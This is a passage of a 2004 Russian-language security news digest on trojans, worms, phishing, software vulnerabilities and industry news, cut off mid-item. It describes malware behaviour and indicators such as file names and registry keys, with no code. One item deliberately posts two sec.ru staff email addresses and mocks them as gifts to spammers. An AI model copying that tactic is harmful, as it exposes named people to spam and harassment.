"Лаборатория Касперского" сообщила об обнаружении троянской программы rojanSpy.Win32.Tofger.s. Написана она на языке Assembler. Размер главной компоненты - около 17 КБ. После своего запуска ищет все текстовые файлы на дисках c:, d:, e: и сохраняет полученное дерево для последующего использования. После завершения работы выводит окно с заголовком "Symantec Team Antivirus Tools" и текстом "No virus activity found". При инсталляции "троянец" сохраняет свой основной компонент "svchost.exe" в системный каталог Windows и регистрирует его в ключе автозапуска системного реестра: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Online Service] Троянец также создаёт следующие файлы в каталоге Windows: "sysini.ini" - файл для сохранения информации; "msto32.dll" - перехватчик клавиатуры. Вредоносные действия: троян скачивает свои обновления c адресов http://161.58.226.xx и копирует их в системный каталог Windows под именем "surte.exe" и запускает. Собирает на компьютере разнообразную информацию: логи клавиатуры, содержимое буфера обмена и пр. и периодически отсылает её автору.
viruslist.ru

24/08/2004 17:00 О том, как некоторые сайты по безопасности заниматся рассылкой спама
Довольно интересная и неприятная ситуация сложилась у членов нашей команды с одним из российских сайтов, позиционирующем себя, как Интернет-портал по безопасности - www.sec.ru. С некоторых пор на почтовые ящики нашей команды стали поступать анонсы о различных акциях, проводимых этим сайтом. Нисколько не сомневаясь в необходимости и полезности подобных мероприятий, члены нашей команды единодушно пришли к мнению, что подобная рассылка скорее напоминает спам по крайней мере по 2-м показателям:
1. Абсолютная ненужность подобной информации для пользователей нашей почтовой системы.
2. Мы подобный "сервис" не заказывали.
Ввиду всего вышеизложенного на контактный почтовый адрес Sec.Ru (support@sec.ru -- пусть спамеры радуются) от имени администратора нашего почтового сервера было послано письмо с просьбой не слать на почтовые адреса домена uinc.ru свои рассылки. Через некоторое время был получен ответ от редактора Sec.ru (или рассылки Sec.ru) госпожи Алёны Ширяевой (почтовый адрес elen@sec.ru - пусть у спамеров Новый Год наступит) с просьбой указать - какие адреса должны быть удалены из рассылки (ничего не напоминает?). В ответ (для блондинок - повторили дважды) был дан ответ, что на все из домена uinc.ru. Наступило временное затишье. И вот сегодня, видать, у sec.ru случился конфуз. Прошла очередная рассылка спама. В соответствии с собственной политикой безопасности (о чём, собственно, господа из sec.ru были предупреждены) доступ с сервера 217.16.31.2 был перекрыт. Также будет отслано письмо в "Мастерхост", в которой господа "специалисты по безопасности" имеют честь хоститься.
UINC Team

24/08/2004 12:19 Необычная интернет-атака на немецкие банки
Необычной Интернет-атаке со стороны мошенников подверглись в минувшие выходные дни клиенты двух крупных немецких банков. Многочисленные владельцы счетов в этих немецких крупнейших банков получили по электронной почте послания, оформленные по всем правилам от имени этих финансовых институтов. В них клиенты предупреждались... о наличии в Интернете мошенников. В этой связи их просили зайти на якобы новый банковский сайт и оставить там конфиденциальную информацию, в частности, так называемый транзакционный код. С его помощью аферисты могли без особого труда опустошить счет доверчивого клиента. Пока не установлено, нашлись ли легковерные вкладчики, однако банки тут же выступили с соответствующим предупреждением, сообщает газета "Франкфуртер альгемайне цайтунг". За последнее время в Германии резко выросла преступность, связанная с банковскими операциями через Интернет. Количество подложных электронных посланий, с помощью которых преступники пытаются выведать данные клиентов, по сведениям газеты "Хандельсблатт" увеличилось с 300 в прошлом году до 200 тысяч за один только март 2004 года.
РИА "Новости"

24/08/2004 11:50 ENUM: каждому британцу с мобильником - по собственному IP-адресу?
По сообщениям британской печати, министерство торговли и индустрии страны (The Department of Trade and Industry) вынашивает амбициозные платы по объединению телефонных номеров и IP-адресов в единый уникальный идентификатор абонента. Иными словами, британское правительство рассматривает возможность создания базы данных, в которых телефонные номера соответствовали бы IP и даже почтовым адресам. Возможность предоставления такого сервиса рассматривается в рамках представленного в начале августа проекта ENUM, основанного на архитектуре DNS (Domain Name System). В перспективе внедрение номеров ENUM позволит, например, обеспечивать доступ к голосовым и e-mail сервисам, Web-страницам, а также перезванивать используя протокол SIP (session initiation protocol). В то же время пользователям телефонов с поддержкой ENUM будут доступны такие интернет-сервисы, как, например, потоковое аудио. Телефонный ENUM-номер транслируется в IP-адрес в несколько шагов: первоначально определяются коды регионов и стран, затем удаляются ненужные пробелы и дефисы. Затем цифры "реверсируются", размещаются точки перед каждой цифрой и в конце концов добавляется домен "e164.arpa". Таким образом, например, телефонный номер (+44) 07879 999999 будет транслирован в 9.9.9.9.9.9.9.7.8.7.4.4.e164.arpa. Как всегда, все хорошие идеи имеют обратную нелицеприятную сторону: "овчинка" по внедрению системы ENUM, может, и стоит выделки, однако, что делать с защитой от вездесущих спаммеров, которые обязательно ухватятся за дополнительную возможность нагадить еще одним способом? Вопрос защиты пользователей такой системы от спама пока остается открытым.
Источник

24/08/2004 11:40 Выход Knoppix 3.6.
Вышла новая версия отличного Linux LiveCD дистрибутива Knoppix 3.6. Напомним, что дистрибутив построен на базе дистрибутива Debian и предназначен как в качестве полноценной ОС, так и ОС для ознакомления (при загрузке с CD). В новой версии включены ядра 2.4.27 и 2.6.7 (опционально), KDE 3.2.3, GIMP 2.0, расширена база поддерживаемого "железа", включен сервер FreeNX и др.
Сайт проекта

24/08/2004 11:26 Уязвимость в браузере Konqueror
Разработчики проекта оконного интерфейса с открытым кодом KDE cообщают о наличии уязвимости в браузере Konqueror. Уязвимость позволяет удаленному веб-серверу установить cookie на компьютере-жертве таким образом, что браузер передаст их любому другому сайту, находящемуся в той же доменной зоне. Подобный Вэб-сайт может быть использован как часть так называемой атаки с фиксацией сессии (session fixation attack). Масштаб атаки ограничен тем, она может осуществляться в доменах, имеющих более двух символов во второй части доменнного имени. В качестве примера можно привести домены ltd.uk, .plc.uk и .firm.in. Домены зон .com, .net, .mil, .org, .gov, .edu, .int уязвимости не подвержены. Также невозможно провести атаку для таких, довольно популярных доменов, как .co.uk, .co.in. Уязвимость присутствует в версиях KDE до 3.2.3 и отсутствует в версии 3.3. Патчи для версий 3.0.5b, 3.1.5, 3.2.3 доступны на сайте производителя. Для общего ознакомления приводим также ссылку на документ в формате PDF, описывающий атаку с фиксацией сессии.
Подробности
Документ

24/08/2004 11:05 Червь массовой рассылки Bugbros
Компания Computer Associates предупреждает о появлении в интернете новой вредоносной программы Bugbros, пишет "Компьюлента". После проникновения на компьютер этот червь создает в системной директории Windows файлы с именами twunk_64.exe и ElimB.exe, после чего пытается осуществить массовую рассылку собственных копий по электронной почте. Однако из-за ошибок в коде червь зачастую "забывает" прикрепить вложения к отправляемым письмам. Кстати, в теме посланий всегда указывается строка "Security Update", а в тексте содержится рекомендация обновить браузер Internet Explorer версии 5.01 и выше. Широко распространения вирус Bugbros пока не получил.

24/08/2004 10:18 В Италии прошел форум хакеров
500 главных итальянских хакеров собрались в эти выходные в Пескара на Адриатическом побережье, чтобы обменяться опытом в области программирования, компьютерных и информационных сетей. Съезд гениев компьютера впервые проводится на территории Италии. Хакеры называют себя кудесниками, которые находят лазейки и ошибки в компьютерных сетях, программах и системах безопасности. Как заявляют сами участники съезда, все, что они делают, - это "исключительно ради развлечения, игры, самообразования и страсти к технологиям для дальнейшей работы в этой области". Однако ни для кого не секрет, что есть и такие, кто использует свои навыки против таких гигантов в области систем программирования, как Майкрософт, или нападают на сайты частных компаний ради получения выгоды. Но в основном хакерами, по их словам, движет "любопытство и желание помочь обществу". Большинство молодых людей, приехавших на форум, уже работают администраторами компьютерных сетей, программистами, разработчиками сайтов и систем безопасности или стремятся к тому, чтобы получить хорошую работу в одной из этих сфер. Как говорят многие из участников встречи, их мечтой является разработка какой-нибудь полезной программы для тех, кто пользуется информационными системами. Спортивный комплекс, в котором прошло мероприятие, на три дня превратился в настоящий сверхтехнологический центр коммуникаций с доступом в Интернет, в том числе - беспроводным, с тем чтобы позволить молодым людям с портативными компьютерами продемонстрировать свое искусство. Состоялось около 30 семинаров о последних достижениях в области информатики, прошли круглые столы, за которыми часто председательствовали сами организаторы съезда, имели место жаркие дебаты.
ИТАР-ТАСС

24/08/2004 10:04 Появился новый российский поисковик Listo.ru
В рунете появился ещё один поисковый сервер Listo.Ru. Поиск на сайте каталогизирован по категориям (более 50). Владельцам интернет-ресурсов доступна бесплатная регистрация в каталоге, а также в Рейтинге Топ100. После регистрации клиент устанавливает на свой сайт счетчик LISTO.RU, после чего получает доступ к статистике и становится участником Рейтинга Топ100 LISTO.RU. Посетители Каталога могут проводить поиск по Каталогу LISTO.RU, а также в других поисковых системах. Проект стартовал совсем недавно, в последних числах июля 2004 года.
Поисковый сервер Listo.Ru

23/08/2004 20:39 Менеджер по безопастности Microsoft - адепт OpenBSD
Всем, кто так или иначе связан с продуктами Microsoft известно, что за последний год компания уделяет много внимания пропаганде безопасности своих продуктов и пытается следовать своим же словам. Удачным примером тому может служить разработка IIS 6.0 (Internet Information Services 6.0). По словам менеджера по вопросам безопасности продуктов Microsoft Джеспера Джонсона Microsoft в последнее время активно использует средства автоматического аудита исходного кода на известные типы уязвимостей и регулярно проводит тренинги для программистов компании по вопросам разработки безопасных приложений. Сам Джеспер является приверженцем технологии Open Source и адептом операционной системы OpenBSD, что естественно сказывается на подходах к вопросам безопасности реализованных в недавно вышедшем Windows XP Service Pack 2. Самое главное, замечает Джеспер, то что безопасность это непрерывный процесс и он базируется не на продукте как таковом, а на тех мероприятиях, которые предпринимаются при его эксплуатации.
Подробности

23/08/2004 20:00 Иллюстрированное руководство по использованию хэшей в криптографии
На сайте Unixwiz.net профессор Edward Felten отличное иллюстрированное руководство, которое в доступной форме описывает, что такое хэши, для чего они предназначены и сферы их применения (проверка целостности файлов, хэширование паролей, цифровая подпись документов). В руководстве также рассматривается вопрос стойкости различных криптоалгоритмов при использовании хэширования.
Руководство

23/08/2004 18:09 SecurIT: новая версия системы защиты информации Zserver
Компания SecurIT выпустила новую версию системы защиты информации Zserver для MS Windows. Об этом сообщила пресс-служба компании. Новая версия Zserver 3.0 поддерживает алгоритмы шифрования AES и ГОСТ 28147-89, имеющие длину ключа шифрования 256 бит. Пользователи имеют возможность выбора алгоритма шифрования и использования различных алгоритмов при защите нескольких разделов жесткого диска сервера. В новом решении на одной смарт-карте можно хранить до 16 различных ключей. Реализована функция ввода PIN-кода смарт-карты “под принуждением”. Zserver 3.0 имеет следующие возможности: фоновое шифрование, обеспечивающее начальное шифрование раздела без его монопольной блокировки, что позволит избежать простоя сервера и сократить время на ввод системы в эксплуатацию, форматирование диска с шифрованием, позволяющее производить операцию зашифровывания только что созданного раздела одновременно с форматированием, администрирование нескольких серверов из одной консоли, ведение и просмотр журнала событий. Набор скриптов Zserver Script Pack расширяет возможности Zserver по использованиею пользовательских сценариев.
Пресс-релиз компании

23/08/2004 18:00 Ошибка в IE открыла новый способ заражения компьютера
Из-за дефекта Internet Explorer люди, посетившие веб-сайт злоумышленника и кликнувшие на картинке, могут, не подозревая об этом, занести в свой ПК вредоносную программу. Независимый эксперт предупредил, что дефект Internet Explorer превращает механизм drag-and-drop в drag-and-infect — даже на компьютерах с последним обновлением Microsoft. Уязвимость проявляется в Internet Explorer из Windows XP даже после установки Service Pack 2 и позволяет атакующему занести свою программу в компьютер жертвы, заманив ее на свой веб-сайт и убедив кликнуть на изображении. Программа злоумышленника будет помещена в папку Windows startup и выполнится при следующей перезагрузке системы. Обнаруживший ошибку эксперт, известный под псевдонимом http-equiv, приводит пример, демонстрирующий возможности, которые она открывает. «На веб-странице видны две красные линии и изображение; отбуксируйте изображение через обе линии и отпустите его, — пишет он. — На самом деле вы перенесли программу в свою папку startup. Она запустится, как только вы включите компьютер в следующий раз». Компания Secunia утверждает, что эксплойт, использующий эту проблему, можно упростить еще больше, так что пользователю достаточно будет просто кликнуть на изображении. Secunia оценивает уязвимость как «высоко критическую» — это второй после самого высокого уровень опасности по ее шкале. В Microsoft сказали, что проблема не представляет серьезной опасности для пользователей, так как атакующий должен заманить его на свой сайт и вынудить на активные действия. Ниже представлена ссылка на страницу, демонстрирующую уязвимость.
Демонстрация

23/08/2004 17:35 Обнаружена новая уязвимость в Cisco IOS
Обнаружена очередная уязвимость в операционной системе Cisco IOS, использующейся в качестве программной платформы для большинства маршрутизаторов и коммутаторов Cisco. Как сообщается, используя дыру, злоумышленник может спровоцировать перезагрузку удаленного устройства или осуществить DoS-атаку. Проблема связана с неправильной обработкой OSPF-пакетов (Open Shortest Path First) и затрагивает версии Cisco IOS с номерами 12.х и R12.х. Устранить опасность можно путем инсталляции обновленной модификации вышеназванной операционной системы. Подробную информацию о дыре можно найти на официальном сайте компании Cisco.
cisco.com

23/08/2004 17:28 Подробности о новой версии трояна Download.Ject
В минувшую пятницу сразу несколько компаний, специализирующихся на вопросах компьютерной безопасности, зафиксировали появление в интернете новой версии вредоносной программы Download.Ject. Этот троян, напомним, проникает на компьютер при посещении пользователем определенных сайтов. Причем ссылки на такие веб-ресурсы, как правило, расположенные на серверах в России, Соединенных Штатах и Уругвае, распространяются при помощи систем обмена мгновенными сообщениями ICQ и AIM. Как передает TechWeb, ссылку на вредоносный ресурс достаточно легко распознать. В послании, в частности, всегда указана строка "My personal home page http://XXXXXXX.X-XXXXXX.XXX/". При этом, впрочем, сообщения могут приходить как с неизвестных учетных записей, так и с аккаунтов, помещенных в контакт-лист. При переходе по ссылке заражение происходит автоматически через несколько дыр в браузере Internet Explorer. Полностью пропатченные компьютеры с Windows ХР SP1 и браузером IE шестой версии также уязвимы. Правда, установка второго сервис-пака для вышеназванной ОС позволяет устранить опасность. Наиболее заметным эффектом от присутствия Download.Ject на компьютере является изменение домашней страницы браузера на ресурс с контентом "для взрослых". Кроме того, троян отображает соответствующие рекламные баннеры.
compulenta.ru

23/08/2004 17:27 Panda Software: Недельный отчет о вирусах и вторжениях
Panda Software выпустила очередной недельный отчет о вирусах и вторжениях прошлой недели. В нем рассматриваются две версии семейства Mydoom: S и R, а также тесно с ними связанного трояна Surila.B. Версии S и R червя MyDoom имеют следующие общие характеристики: распространяются по электронной почте с темой "photos" и содержат приложение под именем "PHOTOS_ARC.EXE". Когда пользователь открывает этот файл, черви загружаются на компьютер и запускают троян Surila.B; открывают и прослушивают различные порты для предоставления атакующему возможности доступа и вторжения на компьютер; закрывают доступ к веб страницам определенных антивирусных компаний; создают мьютекс 43jfds93872 для обеспечения одновременного функционирования только одной копии червя; ищут файлы со следующими расширениями: ADB, ASP, DBX, HTM, PHP, PL, SHT, TBB, TXT или WAB-, используя свой SMTP механизм, рассылают собственные копий. Различия между Mydoom.S и Mydoom.R в размере файлов, в которых они скрыты, а также в размере файла RASOR38A.DLL (который они создают на зараженном компьютере). Троян Surila.B загружается и запускается червями Mydoom.S и Mydoom.R. Поражает Surila.B компьютеры с платформой Windows 2003/XP/2000/NT, позволяя хакерам получить доступ и совершить вторжение, например, рассылая спам с поддельными адресами отправителя. Для этого он использует список имен и фамилий, которые сочетает с одним из следующих почтовых доменов: aol.com, gmx.net, hotmail.com, mail.com, msn.com, t-online.de, yahoo.co.uk и yahoo.com.
viruslab.ru

23/08/2004 17:02 Хакеры вернули iTunes способность к обмену музыкой
Группа анонимных программистов выпустила новую версию программы, позволяющей обмениваться музыкой через популярный проигрыватель Apple iTunes. Как и старая версия под названием MyTunes, свежеиспеченная OurTunes позволяет просматривать все библиотеки iTunes на других компьютерах и загружать песни в формате МР3 или в предпочитаемом Apple формате ААС. Правда, песнями, приобретенными в музыкальном магазине iTunes и защищенными от копирования технологией Apple, обмениваться нельзя. К тому же OurTunes работает только на компьютерах, подключенных к одной сети. Это означает, что пользователи могут обмениваться песнями в локальной сети, но не могут использовать программу в интернете, как в случае файлообменных программ типа Kazaa. И все же новая версия, вероятно, вызовет тревогу в Apple и в фирмах звукозаписи, которые ведут войну против обмена файлами. На своем веб-сайте создатели OurTunes предупреждают, что программа все еще находится в стадии разработки и может содержать ошибки. На сайте не приводится никакой информации о разработчиках, а письма, отправленные по контактному адресу, остаются без ответа. «Мы — бедные студенты, и если программа вам понравилась, подбросьте нам денег на пиво», — гласит заявление на веб-сайте.
zdnet.ru

21/08/2004 20:00 Новая программа сертификации Cisco
Компания Cisco Systems завершила реализацию новой программы сертификации по IP-телефонии - Cisco IPT Basic, в которой приняли участие шесть российских компаний из числа партнеров компании: ASA Production (Москва), Fortis Forum (Красноярск), Intercrite (Краснодар), Alsi-Telecom (Омск), IVS-seti (Пермь), InSoft Polar (Санкт-Петербург). Главной задачей программы являлся вывод на рынок решений IP-телефонии как стандарта бизнес-коммуникаций и повышение качества услуг при проектировании и внедрении. Для компаний, выразивших желание пройти программу, процесс сертификации был значительно упрощен: снижены затраты и первичные инвестиции на прохождение специализации, организована бонусная система, предоставлены специальные цены на закупаемое оборудование, обеспечено проведение совместных семинаров для клиентов, а также организован бесплатный курс по передаче голоса поверх IP в рамках Cisco Reseller University. Чтобы принять участие в программе IPT Basic, реселлер должен был отвечать ряду требованиям - в частности, располагать сертифицированным персоналом, пройти курсы и сдать соответствующие экзамены, приобрести лабораторию согласно предоставленной спецификации и др.
"Открытые системы"

21/08/2004 14:48 Хакеры из Румынии взломали сеть антарктической станции
На этой неделе издание SecurityFocus опубликовало новую информацию о взломе компьютеров американской антарктической станции "Амудсен-Скотт", расположенной на географическом южном полюсе Земли, пишет "Компьюлента". В мае прошлого года администраторы компьютерной сети станции получили анонимное электронное письмо, в котором рассказывалось о взломе компьютеров, отвечающих за жизнеобеспечение станции, а также хранящих важную информацию. Хакеры потребовали от американских исследователей деньги, пригрозив передать похищенную информацию "другой стране". В доказательство хакеры прислали фрагмент похищенной информации. Естественно, компьютеры были сразу же отключены от сети, а расследованием инцидента занялось ФБР. Было установлено, что письмо было отправлено из интернет-кафе в Румынии. Позднее были арестованы подозреваемые, причем в Министерстве юстиции США и ФБР отмечали, что оперативная реакция на атаку стала возможна благодаря весьма неоднозначному закону Patriot Act, который позволяет проводить слежку, обыски и другие следственные мероприятия без лишних формальностей. Однако в материале SecurityFocus выражается сомнение в том, что дело обстояло именно так. Со ссылкой на документы Национального научного фонда США, полученные в соответствии с законом о свободе распространения информации, в SecurityFocus отмечают, что никакого серьезного ущерба атака румынских хакеров станции не нанесла. Никакие критически важные системы не пострадали, да и критически важной информации хакеры похитить не смогли. Более того, двумя месяцами ранее станция "Амудсен-Скотт" подверглась другой атаке, о которой американские власти умалчивают. Тогда хакер под псевдонимом PoizonB0x взломал основные и резервные компьютеры, управляющие интерферометром DASI, исследующим фоновое микроволновое излучение Вселенной.
Подробнее

21/08/2004 14:27 Сервис-пак для Windows XP появился в системе автоматических обновлений
Компания Microsoft после небольшой задержки начала распространение сервис-пака через службу автоматических обновлений операционной системы Windows XP. Как сообщает CNET News, пакет обновлений начал поступать пользователям, включившим функцию автоматического обновления, в среду вечером. Объем сервис-пака зависит от количества уже имеющихся в системе обновлений, но, в среднем, составляет более 80 Мб. Это достаточно много, но заметно меньше, чем 266 Мб, которые занимает появившаяся 9 августа полная версия сервис-пака. В Microsoft отмечают, что процесс распространения сервис-пака будет достаточно длительным. Автоматическое обновление Windows XP Home займет, по меньшей мере, несколько недель. А все пользователи, желающие установить обновление, получат его к октябрю. Эти сроки включают и время на обновление компьютеров с Windows XP Professional, автоматическое обновление которых начнется не раньше 25 августа. Русскоязычная версия сервис-пака появится в сентябре.
Подробности

21/08/2004 14:03 Microsoft обновила второй сервис-пак для Windows ХР
Корпорация Microsoft выпустила заплатку для недавно вышедшего второго пакета обновлений для операционной системы Windows ХР. Опубликованное исправление устраняет ошибку, возникающую при работе программ с адресами обратной петли (loopback addresses). Такие адреса обычно применяются в ходе диагностических тестов, при которых сигнал возвращается передающему устройству, пройдя по коммуникационному каналу в обоих направлениях. Это позволяет тестировать сетевое программное обеспечение без использования реальной сети. Как сообщается на сайте софтверного гиганта, ошибка может возникать в том случае, если приложения используют loopback адреса, отличные от 127.0.0.1. При этом на экран выводится уведомление о невозможности установления соединения. Впрочем, данная ситуация возникает достаточно редко, поэтому софтверный гигант рекомендует загружать заплатку только тем пользователям, которые действительно сталкивались с вышеописанной проблемой.
SecurityLab.Ru

21/08/2004 13:31 Удаленная уязвимость в Courier-IMAP
iDefence обнаружена возможность удаленного выполнения кода в Courier-IMAP версии от 1.6.0 до 2.2.1 включительно (последняя версия - 3.0.7). Уязвимость формата строки была обнаружена в функции auth_debug(). Для предотвращения проникновения в систему достаточно проследить, чтобы был отключен отладочный режим на этапе аутентификации (переменная DEBUG_LOGIN=0 в файле конфигурации).
Описание

21/08/2004 13:14 Уязвимость в MySQL 3.x, 4.x
Обнаружена уязвимость в популярной в мире открытых систем СУБД MySQL. Локальный пользователь может заменить ссылками на произвольные файлы временные файлы утилиты mysqlhotcopy из состава MySQL, чтобы повысить свои привилегии.
Описание

21/08/2004 12:33 IBM требует запрета на распространение Linux для SCO
IBM обратилась в федеральный суд с просьбой наложить запрет на распространение компанией SCO Group любого Linux-ПО. В ходатайстве о судебном постановлении в рамках упрощенного судопроизводства, поданном в среду в окружной суд Солт-Лейк-Сити, IBM просит суд вынести решение в пользу своего встречного иска, обвиняющего SCO в нарушении условий лицензии на распространение Linux. Представитель IBM отказался добавить что-либо к тексту ходатайства. Представитель SCO сказал, что компания оспаривает заявление IBM и вскоре ответит на него в суде. В ходатайстве говорится, что распространяя ПО Linux по лицензии GNU General Public License (GPL) и в то же время заявляя, что эта лицензия неправомерна, SCO сама утрачивает право на распространение кода Linux, особенно того, вклад в разработку которого внесла IBM. SCO выступала с резкой критикой GPL, в одном юридическом документе даже утверждая, что эта лицензия нарушает конституцию США. «SCO без разрешения скопировала защищенный авторскими правами исходный код 16 разных пакетов ПО, написанных IBM для Linux, и распространяет эти копии в составе собственных продуктов, — говорится в ходатайстве IBM. — Несмотря на то, что программы IBM для Linux защищены авторскими правами, их копирование, модификация и распространение разрешены другим лицам на условиях… GPL. Однако SCO порицает, отвергает и не признает GPL, поэтому GPL не дает SCO права копировать и распространять результаты работы IBM, защищенные авторскими правами». В своем ходатайстве IBM просит вынести частое постановление, что SCO нарушила авторские права IBM, относящиеся к Linux, и наложить бессрочный судебный запрет на распространение SCO спорного кода Linux.
Подробности

20/08/2004 16:53 Yahoo! обезвредила бреши в своей почтовой службе
Компания Yahoo! ликвидировала две бреши в своей почтовой службе, сообщает сайт News.com. Найденные уязвимости позволяли злоумышленникам получать информацию из cookies клиента почтового сервера и менять внешний вид некоторых страниц. Представители Yahoo! сообщили, что бреши были ликвидированы в июле. "О существовании брешей нас предупредили в конце мая - начале июня. Одну из уязвимостей можно было ликвидировать за несколько дней, на другую потребовалось значительно больше времени", - сказала пресс-секретарь компании Мэри Осако. Обе уязвимости были связаны с кросс-сайт скриптингом (XXS). Эта методика позволяет организовывать атаки против компьютера клиента почтовой службы. Специальный скрипт перенаправляет его на посторонние сайты и раскрывает злоумышленнику cookies пользователя. Бреши были ликвидированы путем изменений в программном коде сервера. Никаких патчей пользователям скачивать не требуется.
viruslist.ru

20/08/2004 16:33 Уязвимость в Qt
Secunia сообщает об обнаруженной уязвимости в популярной кросс-платформенной библиотеке Qt. Уязвимость возникает из-за неправильной проверки границ буфера в функции "read_dib()" при обработке 8-битных BMP файлов с RLE сжатием. Уязвимость может быть использована для переполнения буфера расположенноко в куче, что в случае успеха приведет к выполнению произвольного кода на машине жертве в любом приложении, использующим Qt для отображения или декодирования BMP файлов. Согласно сообщению MandrakeSoft, обработчики XPM, GIF, и JPEG форматов также уязвимы. Уязвимость подтверждена в версии 3.3.2 и более ранних. Уязвимость исправлена в версии 3.3.3. Степень опасности - высокая (Highly critical), уязвимость обнаружил Chris Evans.
Secunia Advisory,
Original Advisory

20/08/2004 16:30 Еще одна уязвимость в MySQL
На этот раз уязвимость связана с функцией "mysql_real_connect()", где неправильно проверяется длина буфера при определении IP адреса по имени хоста, что теоретически может привести к его переполнению. Об уязвимости сообщил Lukasz Wojtow, степень опасности - некритичная (Less critical). Уязвимость подтверждена в MySQL 4.0.20 и более ранних. Сообщается, что уязвимость не может быть задействована на Linux и OpenBSD платформах.
Secunia Advisory,
MySQL Advisory

20/08/2004 15:48 Ещё один документ об исследовании безопасности MD5
В Интернете опубликован ещё один документ, посвящённый описанию проблем шифрования в алгоритме MD5 (ранее мы сообщали об уязвимости в различных алгоритмах криптографии).
Cтатья

20/08/2004 11:37 Cтатья о безопасности от ЗАРАЗы
Наш соотечественник с ником ЗАРАЗА опубликовал в Интернет статью, которая называется "Вопросы безопасности инфраструктуры синхронизации времени". Документ посвящён исследованию аспектов безопасности в различных реализациях службы синхронизации времени, в том числе и в Microsoft Active Directory.
Статья

20/08/2004 10:34 Уязвимость в MySQL
В одном из компонентов базы данных MySQL обнаружена уязвимость. Как сообщается, проблема связана с утилитой копирования Mysqlhotcopy. Дело в том, что эта подпрограмма создает временные файлы, используя легко предугадываемые имена. Данная особенность может использоваться злоумышленниками для перезаписи определенных файлов в целевой системе с целью повышения уровня собственных привилегий в ней. Правда, осуществить атаку с удаленного компьютера невозможно, в связи с чем уязвимость охарактеризована как малоопасная. Уязвимость присутствует в MySQL версий 3.х и 4.х.
Подробности

19/08/2004 17:34 Hewlett-Packard прекращает выпуск процессоров Alpha
В понедельник Hewlett-Packard выпустит последний процессор Alpha — положив тем самым начало конца несостоявшейся династии чипов. Процессор Alpha EV7z с тактовой частотой 1,3 ГГц значится последним в производственных планах НР, и представитель компании подтвердил это. Чип будет применяться в существующем сервере HP GS 1280, который может включать до 64 процессоров и стоит несколько тысяч долларов. НР не планирует выпускать новые версии Alpha, но продолжит продажи Alpha-серверов до 2006 года и сохранит полную поддержку этих систем до 2011 года. С момента присоединения Compaq НР призывает заказчиков переходить на другие серверные платформы. Разработанный компанией Digital Equipment и выпущенный в 1992 году, процессор Alpha часто получал одобрительные отзывы аналитиков и показывал хорошие результаты в сравнительных тестах. Первая версия Alpha работала с рекордной тактовой частотой 200 МГц. Этот 64-разрядный чип мог исполнять разные операционные системы — как Unix, так и Microsoft Windows NT, — и ему прочили долгую 25-летнюю жизнь. Alpha стал также первым процессором, достигшим тактовой частоты 1 ГГц при обычных условиях — еще в 1999 году. К сожалению для Digital, этот процессор — и серверы на его основе — собрал лишь небольшое ядро преданных заказчиков. Он был дорогим, и поиск прикладного ПО, способного работать на Alpha, был постоянной головной болью для пользователей. Ввиду низкого уровня продаж Alpha-систем Microsoft в 1999 году прекратила выпуск версии Windows NT для этого чипа. Compaq приобрела Alpha в 1998 году, когда купила Digital, а НР стала его владельцем, когда купила Compaq. Лицензионное соглашение, позволяющее Samsung разрабатывать процессоры Alpha, закончилось пшиком. Несмотря на вялые продажи, процессор — и создавшие его инженеры — оказал самое непосредственное влияние на развитие отрасли. В оригинальном процессоре Athlon компании Advanced Micro Devices использовалась шина, первоначально разработанная для Alpha. В последующем чипе Opteron применяется высокоскоростная межпроцессорная магистраль HyperTransport и встроенный контроллер памяти — технологии, аналогичные тем, которые первыми предложили разработчики Alpha. Членом этой команды был нынешний директор AMD по процессорам Дирк Мейер.
ZDNet

19/08/2004 17:22 Выход Netscape Navigator 7.2
Наконец-то увидела свет долгожданная (определённой частью сетевого сообщества) версия браузера Netscape. В последнее время (после покупки AOL?) браузер очень сильно сдал свои позиции Mozilla и Opera, развивающимися более стремительными темпами. Не постигнет ли Netscape со временем участь довольно популярного в начале 90-х годов (и довольно хорошего по тем временам) браузера Mosaic? Итак, из нововведений в версии 7.2: улучшен контроль за всплывающими окнами, password Manager позволяет просмаривать сохранённые пароли, поддержка vCard в Netscape Mail, улучшения с работой с Palm, улучшения в размере занимаемой памяти и скорости запуска, улучшения поддержка Web стандартов. Как известно в крайних версиях Mozilla используется движок Mozilla. На каком из них основана новая версия Netscape - не сообщается.
Более подробно

19/08/2004 17:07 Опасные уязвимости в NetBSD ftpd
В ftpd-сервере NetBSD обнаружены несколько уязвимостей, сообщает "Компьюлента". Как сообщается, дыры, теоретически, предоставляют злоумышленнику возможность получить полный доступ к удаленной системе или повысить свои привилегии в ней. Ошибки присутствуют в NetBSD версий 1.6, 1.6.1, 1.6.2, 1.5, 1.5.1, 1.5.2 и 1.5.3. Устранить опасность можно путем инсталляции обновленной версии программы или отключения сервиса ftpd. Дополнительную информацию об уязвимостях, а также подробные инструкции по настройке ftpd можно найти на сайте поддержки разработчиков.
Описание от Secunia

19/08/2004 16:55 В Украине появился домен .IN.UA
По информации известного регистратора iName.com.ua, делегированный 28 июля с.г. домен .IN.UA позиционируется как домен для частных лиц, но он с успехом может быть использован и в качестве универсального двухбуквенного домена 3-его уровня для любых сайтов, имеющих отношение к Украине. Анализ существующего пула предварительных регистраций iName позволяет предположить, что в первые дни сентября будет зарегистрировано порядка тысячи доменных имен. Самыми популярными именами, подаваемыми на предварительную регистрацию в службу iName.com.ua являются: design.in.ua, hosting.in.ua, kiev.in.ua, love.in.ua, made.in.ua, rabota.com.ua, sat.in.ua, seminar.in.ua, telecom.un.ua.
iName

19/08/2004 16:28 ISP изолируют спамеров
Британские интернет-сервис-провайдеры решили закрывать те сайты электронной коммерции, которые используют спам для рассылки рекламы — но так как большинство таких сайтов уже перенесло хостинг за рубеж, ISP призывают международные организации принять аналогичные правила. Британские ISP приняли свод правил, которые позволят им отключать сайты электронной коммерции, замеченные в рассылке спама, независимо от того, как и откуда этот спам рассылается. На экстренном общем совещании 150 ISP-членов Лондонской интернет-биржи (London Internet Exchange, LINX), которая контролирует свыше 90% интернет-трафика Великобритании, согласились принять комплекс мер, нацеленных на устранение пробелов существующей системы борьбы со спамом. Инициатива LINX призвана отсечь тех спамеров, чьи сайты электронной коммерции хостируются у авторитетных ISP, и которые в то же время распространяют спам из другой сети. Теперь ISP будут применять антиспамерские правила к владельцам веб-сайтов даже в том случае, если те привлекают к рассылке спама посредников. Инициатива была обнародована в среду утром в форме документа Best Current Practice (BCP) LINX. Представитель LINX Малколм Хатти согласен, что реализовать ее будет нелегко по двум причинам. Во-первых, существует опасность, что сайт электронной коммерции может быть закрыт конкурентом, рассылающим спам от его имени. Вторая проблема связана с тем, что большинство 